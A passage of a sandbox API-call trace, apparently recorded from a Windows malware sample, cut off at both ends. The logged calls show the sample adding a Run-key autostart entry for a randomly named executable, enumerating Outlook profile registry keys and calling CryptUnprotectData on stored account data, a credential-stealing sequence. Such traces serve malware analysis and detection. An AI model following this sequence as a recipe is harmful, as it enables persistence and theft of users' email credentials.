ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde620 | out: TokenHandle=0xde620*=0x17c) returned 0x0 [0162.212] NtQueryInformationToken (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0xdde18, TokenInformationLength=0x400, ReturnLength=0xde618 | out: TokenInformation=0xdde18, ReturnLength=0xde618) returned 0x0 [0162.212] ConvertSidToStringSidW (in: Sid=0xdde20*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde61c | out: StringSid=0xde61c*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0162.212] NtClose (Handle=0x17c) returned 0x0 [0162.413] NtCreateKey (in: KeyHandle=0xdea58, DesiredAccess=0x2021f, ObjectAttributes=0xde61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea58*=0x17c) returned 0x0 [0162.459] NtSetValueKey (in: KeyHandle=0x17c, ValueName="GJVLGF", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", DataSize=0x62 | out: Data="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe") returned 0x0 [0162.465] NtClose (Handle=0x17c) returned 0x0 [0162.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.465] NtCreateFile (in: FileHandle=0xdea44, DesiredAccess=0x12019f, ObjectAttributes=0xdea0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea44*=0x0, IoStatusBlock=0xdea2c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.466] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6765c0) returned 1 [0162.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea14, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.466] NtCreateFile (in: FileHandle=0xdea34, DesiredAccess=0x120089, ObjectAttributes=0xde9fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea1c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea34*=0x0, IoStatusBlock=0xdea1c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.466] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6765c0) returned 1 [0162.480] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde3dc | out: TokenHandle=0xde3dc*=0x17c) returned 0x0 [0162.480] NtQueryInformationToken (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0xddbd4, TokenInformationLength=0x400, ReturnLength=0xde3d4 | out: TokenInformation=0xddbd4, ReturnLength=0xde3d4) returned 0x0 [0162.480] ConvertSidToStringSidW (in: Sid=0xddbdc*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde3d8 | out: StringSid=0xde3d8*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0162.480] NtClose (Handle=0x17c) returned 0x0 [0162.481] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x0) returned 0xc0000034 [0162.481] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3d0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x0) returned 0xc0000034 [0162.481] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x17c) returned 0x0 [0162.482] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrc.ini", NtPathName=0xde2c8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.482] NtCreateFile (in: FileHandle=0xde2e8, DesiredAccess=0x120089, ObjectAttributes=0xde2b0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2d0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2e8*=0x0, IoStatusBlock=0xde2d0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.482] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6765c0) returned 1 [0162.485] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.485] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.485] NtClose (Handle=0x1b0) returned 0x0 [0162.485] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.485] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.485] NtClose (Handle=0x1b0) returned 0x0 [0162.485] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.485] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.485] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.485] NtClose (Handle=0x1b0) returned 0x0 [0162.486] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.486] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.486] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.486] NtClose (Handle=0x1b0) returned 0x0 [0162.486] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.493] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.493] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.493] NtClose (Handle=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x5, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.494] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.494] NtClose (Handle=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x6, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.494] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.494] NtClose (Handle=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x7, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.494] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.494] NtClose (Handle=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x8, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.494] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0162.494] NtClose (Handle=0x1b0) returned 0x0 [0162.494] NtEnumerateKey (in: KeyHandle=0x17c, Index=0x9, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0162.495] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0162.495] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0162.495] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x1b4) returned 0x0 [0162.497] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.497] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.513] RtlIntegerToChar (in: Value=0xfde888b0, Base=0x0, Length=0x20, String=0xdd708 | out: String="4259874992") returned 0x0 [0162.513] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.513] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.513] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.526] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0xdd708 | out: String="2") returned 0x0 [0162.526] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.526] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.526] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0162.526] NtClose (Handle=0x1b4) returned 0x0 [0162.526] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0162.526] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x1b4) returned 0x0 [0162.526] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.526] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.544] RtlIntegerToChar (in: Value=0xd84397d8, Base=0x0, Length=0x20, String=0xdd708 | out: String="3628308440") returned 0x0 [0162.544] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0162.545] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="crypt32.dll", BaseAddress=0xdd65c | out: BaseAddress=0xdd65c*=0x76160000) returned 0x0 [0164.726] CryptUnprotectData (in: pDataIn=0xdd6e0, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0xdd6d8 | out: ppszDataDescr=0x0, pDataOut=0xdd6d8) returned 1 [0164.764] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67eef8) returned 1 [0164.829] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.838] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0xdd708 | out: String="0") returned 0x0 [0164.838] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.847] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0xdd708 | out: String="917507") returned 0x0 [0164.847] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.847] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.847] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.847] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0164.847] NtClose (Handle=0x1b4) returned 0x0 [0164.847] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0164.848] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x1b4) returned 0x0 [0164.848] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.849] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.858] RtlIntegerToChar (in: Value=0x3c53db58, Base=0x0, Length=0x20, String=0xdd708 | out: String="1012128600") returned 0x0 [0164.858] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.858] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.858] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: 